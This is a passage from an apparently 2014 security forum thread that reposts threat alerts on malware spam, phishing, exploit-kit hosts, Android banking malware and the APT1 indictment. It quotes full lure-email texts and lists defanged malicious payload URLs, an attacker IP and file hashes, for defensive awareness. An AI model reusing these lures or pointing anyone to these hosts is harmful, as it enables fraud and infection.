Screenshot: https://31.media.tumblr.com/eb6512d56ecfd85bd1d1f26c8cd7e181/tumblr_inline_n5mfb6Pc4p1r6pupn.png

Tagged: 401K, Upatre
___

Fake justice .co.uk - REMINDER NOTICE ...
- http://myonlinesecurity.co.uk/fake-justice-co-uk-reminder-notice-ignore/
15 May 2014 - "Fake justice .co.uk REMINDER NOTICE DO NOT IGNORE is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... a spurious parking ticket, hoping to extort a large sum of money from you...

UK central Police svc notice: http://www.actionfraud.police.uk/alert-beware-of-justice.gov.uk-scam-parking-fine-emails-mar14

Email looks like:
REMINDER NOTICE DO NOT IGNORE
To: submit@ thespykiller .co .uk Case: C5067787
Please print attached form and fax it to +44 020 4869 0219 Your vehicle was recorded parked on our Clients Private Property driveways on the 15.05.2014 and remained on site for 2 hour 28 min. A notice was sent to you on 10.04.2014 which gave 28 days to pay full PARKING CHARGE or challenge the issue. The amount of £78.00 is now due...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/REMINDER-NOTICE-DO-NOT-IGNORE.png

15 May 2014: Form-STD-Vehicle-150514.zip ( 11kb) Extracts to Form-STD-Vehicle-150514.scr
Current Virus total detections: 5/53*
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/33834c0d60f3aeaedcce3de326517df8dc96b5a8515f171f16154f21d5705ce4/analysis/

:fear: :mad:

AplusWebMaster
2014-05-19, 17:57
FYI...

Fake TT PAYMENT COPY - SPAM ...
- http://blog.dynamoo.com/2014/05/tt-payment-copy-spam.html
19 May 2014 - "This spam has a malicious attachment:
Date: Sun, 18 May 2014 20:54:20 -0700 [05/18/14 23:54:20 EDT]
Subject: Re TT PAYMENT COPY
please confirm the attachment payment Copy and get back to me?

Attached is an archive file TT PAYMENT COPY.zip which in turn contains another archive file TT PAYMENT COPY.rar (which relies on the victim having a program to uncompress the RAR file). Once that is done, a malicious executable PaySlip.exe is created. This file has a VirusTotal detection rate of 27/53*. Automated analysis tools... don't reveal what is happening, but you can guarantee it is nothing good."
* https://www.virustotal.com/en-gb/file/8f9be78de7117833112b579ce52d7cb862ab0b9c00ac282b4050d96f1ecef463/analysis/1400507439/
___

High Fashion to High Risk ...
- http://blog.malwarebytes.org/fraud-scam/2014/05/from-high-fashion-to-high-risk/
May 19, 2014 - "... Suffice to say that several Fashion Weeks have come and gone since 2014 started... more runway events have been announced and are already scheduled to happen within the next two to three weeks... it’s highly likely that you may encounter the sites we’ve found these past few days. We have also noted that such sites have increased in number, with most of them carrying the brands Louis Vuitton, Chanel, Gucci, Hermes, and Oakley.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/fantasylouisvuitton.png
...
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/guccioutlet.png
... What fantasylouisvuitton, guccioutlet, and fashionshop-usa have in common goes beyond not having an easy way for anyone to verify the products they say for authenticity. All these sites redirect to random JS (JavaScript) scripts hosted on js(dot)users(dot)51(dot)la, a site that has been associated with many -malicious- activities in the past*. Google Safe Browsing flags it as “suspicious”... Meanwhile, Tumblr users have been inundated with spam posts from users claiming to be students who have put up their own personal fashion site and wishing others to visit it. This is an old Tumblr scam designed to encourage the clicking of adverts, which is often against the Terms of Service (ToS) of many advertising networks and can be seen as a form of click fraud. In this case, scammers specifically looked for those interested in fashion... When it comes to dealing with scams and potentially risky websites, users are always at the losing end. Thus, avoiding such sites, in general, and sticking to visiting legitimate and/or official selling sites of popular brands are best practices to keep in mind."
* https://www.virustotal.com/en/domain/js.users.51.la/information/
___

Targeted Attack Trends - 2H 2013
- http://blog.trendmicro.com/trendlabs-security-intelligence/targeted-attack-trends-a-look-at-2h-2013/
May 19, 2014 - "Targeted attacks are known to use zero-day exploits. However, old vulnerabilities are still frequently exploited. In fact, based on cases analyzed in the second half of 2013, the most exploited vulnerability in this time frame was CVE-2012-0158, a Microsoft Office vulnerability that was patched in April 2012. This shows how important applying the latest patches and security updates are in mitigating the risks posed by these threats.
Most commonly exploited vulnerabilities related to targeted attacks
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/05/tareport2.jpg
... Spear phishing* is still the most seen entry point for targeted attacks. These email messages use relevant-sounding subjects that trick users into opening it and the file attachments therein that serve as malware carriers. In our 2014 prediction, we noted that mobile devices will also be leveraged by threat actors to gain entry to networks... Although targeted attacks are difficult to detect, this task can be made easier with solutions that use advanced threat detection technology that can detect, analyze, and respond to attacks that traditional antivirus signature-based solutions and blacklisting are not capable of. Targeted attacks often leave traces that can serve as indicators of compromise. As such, enterprises and large organizations are encouraged to build their own threat intelligence capability, which they can incorporate into their own existing security solutions..."
> http://about-threats.trendmicro.com/us/threat-intelligence/targeted-attacks/targeted-attack-trends/report-threat-targets-diversify-in-2h-2013
... The latter half of 2013 also bore witness to a series of threat landscape updates that show the aggressive stance of present-day attackers... While bad actors prefer using tried-and-tested attack vectors-such as spear-pshing emails, vulnerabilities, and malware-research shows that they are on the move in terms of diversifying their victims all over the world..."
* http://searchsecurity.techtarget.com/definition/spear-phishing

- http://www.secureworks.com/resources/blog/research/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761/
May 16, 2014

- http://www.reuters.com/article/2014/05/19/us-cybercrime-usa-china-idUSBREA4I09420140519
May 19, 2014 - "The United States on Monday charged five Chinese military officers and accused them of hacking into American nuclear, metal and solar companies to steal trade secrets, ratcheting up tensions between the two world powers over cyber espionage. China immediately denied the charges, saying in a strongly worded Foreign Ministry statement the U.S. grand jury indictment was "made up" and would damage trust between the two nations... Federal prosecutors said the suspects targeted companies including Alcoa Inc, Allegheny Technologies Inc, United States Steel Corp, Toshiba Corp unit Westinghouse Electric Co, the U.S. subsidiaries of SolarWorld AG, and a steel workers' union. Officials declined to estimate the size of the losses to the companies, but said they were "significant." The victims had all filed unfair trade claims against their Chinese rivals, helping Washington draw a link between the alleged hacking activity and its impact on international business. According to the indictment, Chinese state-owned companies "hired" Unit 61398 of the People's Liberation Army "to provide information technology services" including assembling a database of corporate intelligence..."
___

E-On Energy Bill Spam
- http://threattrack.tumblr.com/post/86208169148/e-on-energy-bill-spam
May 19, 2014 - "Subjects Seen:
Unable to process your most recent bill payment
Typical e-mail details:
Dear customer,
This e-mail has been sent to you to inform you that we were unable to process your most recent payment of bill.
Please check attached file for more detailed information on this transaction.
IMPORTANT: The actual delivery date may vary from the Delivery By date estimate. Please make sure that there are sufficient available funds in your account to cover your payment beginning a few days before Delivery By date estimate and keep such funds available until the payment is deducted from your account.
If we fail to process a payment in accordance with your properly completed instructions, we will reimburse you any late-payment-related fees.
We apologize for any inconvenience this may cause.

Malicious File Name and MD5:
Eonenergy-Bill-29052014.zip (73C46BEB4997D121D88E4DA220EB8E75)
Eonenergy-Bill-29052014.scr (FE272CDACF8BB7C3A8B264BFDF3772FD)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/25eb07b63e508fa79319eaea1905cd2b/tumblr_inline_n5tos8wRJh1r6pupn.png

Tagged: eon, Upatre

- http://myonlinesecurity.co.uk/e-energy-unable-process-recent-bill-payment/
19 May 2014
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/Eon-Unable-to-process-your-most-recent-bill-payment.png

* https://www.virustotal.com/en/file/a3e96e906c9212a64d01610f009a59d87b44c2138bee1d6c647272d8358c6675/analysis/

:fear: :mad:

AplusWebMaster
2014-05-20, 14:58
FYI...

Fake Sage Invoice SPAM leads to malware
- http://blog.dynamoo.com/2014/05/fake-sage-invoice-spam-leads-to-malware.html
20 May 2014 - "This -fake- Sage spam leads to malware:
Date: Tue, 20 May 2014 09:20:53 +0100 [04:20:53 EDT]
From: Sage [Wilbur.Contreras@ sage-mail .com]
Subject: FW: Invoice_6895366
Please see attached copy of the original invoice (Invoice_6895366).

Attached is an archive file Invoice6895366.zip which in turn contains a malicious executable Invoice200522014.scr which has a VirusTotal detection rate of 8/52*. The Malwr analysis** shows that it then goes on to download further components from [donotclick]protecca .com/fonts/2005UKdp.zip [108.163.165.122]..."
* https://www.virustotal.com/en-gb/file/3e855b84d59fa0f780b96e7d2b436da633efbfda8181c8407700bac33a606c3c/analysis/1400575304/

** https://malwr.com/analysis/MWRiODI4NDBlYmFlNGNjOTgzNmYzMThjZDFlNzRkMDI/

- https://www.virustotal.com/en-gb/ip-address/108.163.165.122/information/

- http://myonlinesecurity.co.uk/fake-justice-co-uk-reminder-notice-ignore/
Updated 20 May 2014 - "... Another big run of these this morning. See the notice on Justice .co.uk* and Action Fraud** where they are asking you to report these to them..."
* https://www.justice.gov.uk/help/fraud

** http://www.actionfraud.police.uk/alert-beware-of-justice.gov.uk-scam-parking-fine-emails-mar14

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/REMINDER-NOTICE-DO-NOT-IGNORE.png

- http://threattrack.tumblr.com/post/86315391248/uk-ministry-of-justice-spam
May 20, 2014
Tagged: UK Ministry of Justice, Upatre
___

Fake LexisNexis Invoice – PDF malware
- http://myonlinesecurity.co.uk/lexisnexis-invoice-notification-may-2014-fake-pdf-malware/
20 May 2014 - "LexisNexis Invoice Notification for May 2014 pretending to come from LexisNexis [einvoice.notification@ lexisnexis .com] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers...
Email looks like:
There was an invoice issued to your company: thespykiller .co.uk Please double click the PDF attachment to open or print your invoice.
To view full invoice details or for any Online Account Management options, download PDF attachment.
Account Number 278QCB
Invoice Number 195709944451
Invoice Date May 20, 2014
Invoice Amount $3.809.00
Account Balance $0.00
You can PAY YOUR BALANCE through the PowerInvoice please print the attached invoice and mail to the address indicated on the invoice statement...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/LexisNexis-Invoice-Notification-for-May-2014.png

20 May 2014 LexisNexis_Invoice_05202014.zip (12 KB) Extracts to
LexisNexis_Invoice_05202014.scr - Current Virus total detections: 0/52*
This LexisNexis Invoice Notification for May 2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/79531dddf84a667bb833d326ce91cfbf54510f2e5fff4cfa12d24dad854e6fe7/analysis/1400601699/
___

SCAM: FIFA World Cup Tickets
- http://blog.trendmicro.com/trendlabs-security-intelligence/brazilian-users-being-scammed-with-2014-fifa-world-cup-tickets/
March 20, 2014 - "As the 2014 FIFA World Cup Brazil draws near, we are seeing more threats using the event as bait. We recently talked about cybercriminals in Brazil taking advantage of the event to spread malware, but we’ve found that the threats have gone beyond that: we’ve spotted -fake- FIFA websites selling game tickets... For the site meant for visitors from Brazil, would-be fans can buy a ticket for the final Game for 8,630.20 reais (or just under 3,900 US dollars). This price is almost 4000% higher than the official price on FIFA’s website. At a Brazilian complaints site, a user reported that he bought three tickets for the Portugal versus Germany match from this site, but hadn’t received any tickets yet. The victim also claims that this scam site left no phone number to be contacted. Another complaint on the same site says the only way for the scammers to be contacted is via chat or email... This scam is an example of how different legitimate services (hosting, domain registration, online payment system) can be used fraudulently to scam victims around the globe... remember that -only- FIFA is authorized to sell tickets for the World Cup games..."
___

iBanking: Exploiting the Full Potential of Android Malware
- http://www.symantec.com/connect/blogs/ibanking-exploiting-full-potential-android-malware
20 May 2014 - "Powerful Russian cybercrime gangs have begun to use premium Android malware to broaden their attacks on financial institutions. The tool, known as iBanking, is one of the most expensive pieces of malware Symantec has seen on the underground market and its creator has a polished, Software-as-a-Service business model... iBanking often masquerades as legitimate social networking, banking or security applications and is mainly being used to defeat out-of-band security measures employed by banks, intercepting one-time passwords sent through SMS. It can also be used to construct mobile -botnets- and conduct covert surveillance on victims. iBanking has a number of advanced features, such as allowing attackers to toggle between HTTP and SMS control, depending on the availability of an Internet connection... One of the most active iBanking users is the Neverquest* crew, a prolific cybercrime group that has infected thousands of victims with a customized version of Trojan.Snifula**. This financial Trojan can perform Man-in-the-Middle (MITM) attacks against a range of international banks. The Neverquest crew utilizes iBanking to augment its Snifula attacks, capturing one-time passwords sent to mobile devices for out-of-band authentication and transaction verification. Control numbers (the mobile numbers that the bots can receive instructions from) indicate that the Neverquest crew is likely operating out of Eastern Europe... Since iBanking victims are usually tricked into installing the app by a desktop financial Trojan, keeping your desktop antivirus software up to date will help avoid infection. You should be wary of any SMS messages which contain links to download APKs (Android application package files), especially from non-reputable sources. IT administrators should consider blocking all messages which contain a link to install an APK. Some iBanking APKs have been seeded onto trusted marketplaces and users should be aware of this as a potential avenue of infection. Users should be aware of sharing sensitive data through SMS, or at least be aware that malicious programs are sniffing this data..."

* http://malware.dontneedcoffee.com/2013/12/nitmo-no-just-ibanking-used-by-the.html

** http://www.symantec.com/security_response/writeup.jsp?docid=2013-112803-2524-99

:mad::mad: :sad:

AplusWebMaster
2014-05-21, 12:23
FYI...

Something evil on 93.171.173.173 ...
- http://blog.dynamoo.com/2014/05/something-evil-on-93171173173-sweet.html
21 May 2014 - "93.171.173.173 (Alfa Telecom, Russia) is currently distributing the Sweet Orange EK via a bunch of -hijacked- GoDaddy subdomains. The malware is being spread through code injected into legitimate but hacked websites. For example [donotclick]www.f1fanatic .co.uk is a compromised website that tries to redirect visitors to two different exploit kits:
[donotclick]adv.atlanticcity .house:13014/sysadmin/wap/fedora.php?database=3
[donotclick]fphgyw.myftp .biz/kfafyfztzhtwvjhpr37ffn9qi7w0ali5rhczqxcgif3d4
The second one is an attempt to load the Fiesta EK although the payload site is currently down. But the .house domain appears to be Sweet Orange (incidentally this is the first time that I've seen one of the new TLDs abused in this way)... The server on 93.171.173.173 hosts a number of subdomains that are hijacked from GoDaddy customers. I recommend that you block either the subdomain or domains themselves... The EK page itself has a VirusTotal detection rate of 0/53*, although hopefully some of the components it installs will trigger a warning."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/8e5f9f190b55a247fbce13296d38159f90f1dc8e888687a2b073288ebae607ba/analysis/1400664015/

93.171.173.173: https://www.virustotal.com/en-gb/ip-address/93.171.173.173/information/

- http://centralops.net/co/DomainDossier.aspx
93.171.173.173
inetnum: 93.171.172.0 - 93.171.175.255
country: RU ...
origin: AS29182

Diagnostic page for AS29182 (ISPSYSTEM-AS)
- https://www.google.com/safebrowsing/diagnostic?site=AS:29182
"Of the 16625 site(s) we tested on this network over the past 90 days, 264 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-05-22, and the last time suspicious content was found was on 2014-05-22... Over the past 90 days, we found 87 site(s) on this network... appeared to function as intermediaries for the infection of 393 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 260 site(s)... that infected 3562 other site(s)..."
___

FireEye Confirms DOJ’s Findings on APT1 Intrusion Activity
- http://www.fireeye.com/blog/technical/2014/05/the-pla-and-the-800am-500pm-work-day-fireeye-confirms-dojs-findings-on-apt1-intrusion-activity.html
May 20, 2014 - "Yesterday, the U.S. Department of Justice (DOJ) announced the indictment of five members of the Second Bureau of the People’s Liberation Army (PLA) General Staff Department’s Third Department, also known as PLA Unit 61398. This is the -same- unit that Mandiant publicly unmasked last year in the APT1 report*. At the time it was originally released, China denounced the report, saying that it lacked sufficient evidence. Following the DOJ’s indictment, however, China’s usual response changed from “you lack sufficient evidence” to “you have fabricated the evidence”, calling on the U.S. to “correct the error immediately.” This is a significant evolution in China’s messaging; if the evidence is real, it overwhelmingly demonstrates China’s unilateral attempts to leapfrog years of industrial development — by using cyber intrusions to access and steal intellectual property... Although one could attempt to explain every piece of evidence away, at some point the evidence starts to become overwhelming when it is all pointing in one direction. Our timestamp data, derived from active RDP logins over a two year period, matches the DOJ’s timestamp data, derived from a different source — active Dynamic DNS re-pointing over a five year period. These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are... "
(More detail at the fireeye URL above.)
* http://intelreport.mandiant.com/
___

“Amazoon” Phishing
- http://blog.malwarebytes.org/fraud-scam/2014/05/watch-out-for-amazoon-phishing/
May 21, 2014 - "Be warned that there are some typo happy phishers looking out for login credentials... take a trip down the Amazoon:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/amazoon1.jpg
It reads:
Verify your Amazoon account
Dear Amazon user,
We need to confirm your account information,
you must confirm your amazon account before we close it.
Click the link below to confirm your account information using our secure server.

Clicking the “Manage” link will take victims to a page asking for username and password information:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/amazoon2.jpg
After this, they’re faced with a page asking for personal information (name, address, phone number and so on):
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/amazoon3.jpg
The page after this one is broken – looks like the host has taken it down mid-blog so hopefully nobody else will be scammed by this one. Typically the pattern for this kind of thing would be login details, personal information then card data. While we can’t say for sure what lay in wait at step 3, we can say to be on your guard for any more emails from “Amazoon” and -never- hand over personal data such as card details in response to emails you’ve been sent."

>> http://www.dilbert.com/2014-05-19/
___

Fake Contrat Commercant SPAM – PDF malware
- http://myonlinesecurity.co.uk/contrat-commercant-n-9579514-fake-pdf-malware/
21 May 2014 - "Contrat Commercant N: 9579514 pretending to come from Rick Goddard [Rick.Goddard@ credit-agricole .fr] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. This is written entirely in French...
Email looks like :
Bonjour,
Enchante d’avoir fait votre connaissance. Je vous confirme que j’ai bien recupere les documents..
Pouvez-vous me dire si vous souhaitez conserver le contrat commercant n°9579514 ? En effet, sans action de notre part, il sera automatiquement resilie le 22 mai 2014.
Pour eviter automatiquement resilie accorder 2 minutes au service Credit Agricole en remplissant le formulaire ci-joint.
Rick Goddard ...

21 May 2014: Contrat_9579514.zip ( 8kb) Extracts to Contrat_210514.scr
Current Virus total detections: 0/52* ...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/7cbc75c1140d3138bfdbe6becc65c5f064bca38460c9591f5585e24754a4bc09/analysis/
___

PrimeAspire (primeaspire .com) spam
- http://blog.dynamoo.com/2014/05/primeaspire-primeaspirecom-spam.html
21 May 2014 - "Startup or no startup, sending spam to a spamtrap is not a good way to drum up business..
From: Team@ primeaspire .com
To: donotemail@ wearespammers .com
Date: 20 May 2014 13:32
Subject: PrimeAspire - The Freelance Platform
Hello,
Following our recent launch we'd like to invite you to PrimeAspire where you can post any task and securely get skilled people to complete specific freelance tasks.
The platform is completely free and used by talented people looking for freelance projects.
Learn more
Thanks,
The PrimeAspire team ...

Screenshot: http://4.bp.blogspot.com/-a2q8a983zhc/U3vdzEHjMDI/AAAAAAAADB4/frl26R0YCVk/s1600/primeaspire.png

.. CEO of PrimeAspire is one Chris Adiolé. PrimeAspire (strictly speaking it is Prime Aspire Ltd) is a real company (07850209 in the UK), and Mr Adiolé even has his name on the domain WHOIS details rather than hiding behind a proxy service... Originating IP is 79.170.44.6 which is Heart Internet in the UK. The primeaspire.com domain is hosted with the same firm on 79.170.40.239... promoting your startup through spam is always a very bad move..."

:fear: :mad:

AplusWebMaster
2014-05-22, 18:23
FYI...

Browlock -redirects- via Google Image Search
- http://blog.malwarebytes.org/fraud-scam/2014/05/browlock-redirects-via-google-image-search/
May 22, 2014 - "We saw a website offering up a downloadable version of what they claim is Telltale’s Back to the Future game. The site had apparently been -hacked- allowing those who compromised it to add redirect code onto the website. As a side effect of this, clicking on their image via the initial returned results from a Google image search while using Chrome will mean your browser is redirected to a Browlock scam page, complete with dire warnings placed on top of the preview image which is now adrift in a sea of fakery:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/locksearch1.png
... we’re looking at a typical “Your PC has been encrypted, pay us money to return your files” message – the translation of which can be seen over on the F-Secure website* – and depending on your browser set up, you may have a few problems getting rid of the page. For example:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/05/locksearch2.jpg
Once the box is on the screen, there is no way to open another tab or indeed navigate to one that is already open. For similar reasons, you won’t be able to close the browser either. The browser is trapped in a loop of confirmation pop-up boxes and our old friend CTRL+ALT+DEL will be required to kill the browser in Task Manager. The end-user isn’t under too much risk here – the scam page is simply -pretending- that the PC has had all files encrypted, and wants them to pay up to get their hands back on valuable personal data. There have been instances in the past where Fake AV has taken advantage of image search and caused problems for Mac users, and here’s a Youtube video** of the Windows equivalent. In this case, if you’re ever able to get the popup out of the way AND close the image AND open up the vanilla website AND read the Russian text…you should close the browser via the wonder of Task Manager and go do something else anyway. Your data is safe, no need to hand over cash to scammers!"
* http://www.f-secure.com/weblog/archives/00002698.html

** http://www.youtube.com/watch?v=1oxAK4TP6Uk
___

Malvertising ads on popular site leads to Silverlight exploit, Zeus Trojan
- http://blog.malwarebytes.org/exploits-2/2014/05/malvertising-campaign-on-popular-site-leads-to-silverlight-exploit-zeus-trojan/
May 22, 2014 - "Malicious ads displayed on legitimate websites (malvertising) are something we see a lot of these days... third-party content is always a bit iffy because you just can’t control it. Case in point, a popular website recently suffered a malvertising attack. Our honeypots detected the malicious redirection from a compromised ad in the wee hours of last Friday morning. We contacted both the site owners and the advertising agency and the malicious traffic stopped shortly after. Over the course of the weekend and the beginning of the week, we exchanged some further emails to get a better understanding about the attack, which turned out to be an Ad server compromise... the advertising agency had suffered a server compromise themselves. I managed to talk to them and they were willing to share information about the attack that affecte